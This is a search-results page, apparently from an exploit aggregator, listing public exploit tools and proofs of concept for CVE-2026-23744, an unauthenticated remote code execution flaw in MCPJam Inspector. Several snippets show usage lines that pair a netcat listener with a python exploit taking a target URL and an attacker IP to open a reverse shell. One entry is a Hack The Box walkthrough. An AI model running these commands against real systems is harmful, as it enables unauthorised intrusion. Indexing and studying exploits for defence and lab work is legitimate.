26 matches found
MCPJam-Inspector-1.4.2-Remote-Code-Execution-CVE-2026-23744
en kali linux - terminal 1 nc -lvnp 4444 en kali linux - terminal 2 python3 ./CVE-2026-23744.py -t http://TARGET.com -p 4444 -i YOUR-KALI-LINUX-IP...
mcpExec
mcpExec es una herramienta que aprovecha el CVE-2026-23744 para obtener una reverse shell usando la URL de la instalación vulnerable de MCPJam Inspector. Instalación root@kitploit: git clone https://github.com/daemoncibsec/mcpExec.git cd mcpExec python3 -m venv venv source venv/bin/activate pip...
CVE-2026-23744
CVE-2026-23744 python script for exploiting CVE-2026-23744 how to use it : first thing you should open two terminals frist terminal -- nc -nvlp 4444 second terminal -- python CVE-2026-23744.py -lhost your ip -url target url for help menu : python CVE-2026-23744.py -h...
CVE-2026-23744
CVE-2026-23744 python3 CVE-2026-23744.py -u http://devhub.htb:6274 -i 10.10.14.106 -p 4321...
mcpjaminspector-unauth-rce
mcpjaminspector-unauth-rce CVE-2026-23744 MCPJam inspector = 1.4.2에서의 RCE 취약점 세부 정보 https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6 사용법 root@kitploit: usage: mcpjaminspector-unauth-rce.py -h --target TARGET --command COMMAND options: -h, --help show this help message a...
MCPJam Inspector - Remote Code Execution
MCPJam inspector is the local-first development platform for MCP servers. The Latest version 1.4.2 and earlier are vulnerable to a remote code execution RCE vulnerability, which allows an attacker to send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE. id:...
CVE-2026-23744
Este repositorio no tiene un README...
CVE-2026-23744-exploit
Este repositorio no tiene un README...
CVE-2026-23744-PoC
Este repositorio no tiene un README...
DevHub-HTB-Walkthrough
DevHub – Walkthrough de HTB Medium Linux Máquina: DevHub Dificultad: Media SO: Linux Temas: CVE-2026-23744, Túnel Chisel, Jupyter, Flask API, Escalada de privilegios de root 📌 1. Reconocimiento root@kitploit: nmap -sC -sV devhub.htb Resultado: Puerto 22 SSH Puerto 80 HTTP Puerto 6274 MCPJam...
CVE-2026-23744
root@kitploit: uso: exploit.py -h --lhost LHOST --lport LPORT --rhost RHOST CVE-2026-23744 - PoC opciones: -h, --help muestra este mensaje de ayuda y sale --lhost, -l LHOST Dirección IP del atacante --lport, -p LPORT Puerto del atacante --rhost, -t RHOST URL del objetivo...
CVE-2026-23744
Este repositorio no tiene un README...
Exploit for Missing Authentication for Critical Function in Mcpjam Inspector
CVE-2026-23744: Unauthenticated Remote Code Execution PoC...
Exploit for Missing Authentication for Critical Function in Mcpjam Inspector
MCPJam Inspector Authorized Security Validator A bounded proo...
Exploit for Missing Authentication for Critical Function in Mcpjam Inspector
cve-2026...
📄 MCPJam Inspector 1.4.2 Command Injection
This is an advanced Python proof of concept for CVE-2026-23744 demonstrating command injection through a vulnerable MCP API endpoint, leading to remote code execution and reverse shell access. The script supports multiple payload types, endpoint discovery, listener management, and several...
Exploit for Missing Authentication for Critical Function in Mcpjam Inspector
CVE-2026-23744 --- Description MCPJam inspector is a loca...
Exploit for Missing Authentication for Critical Function in Mcpjam Inspector
on kali linux - terminal 1...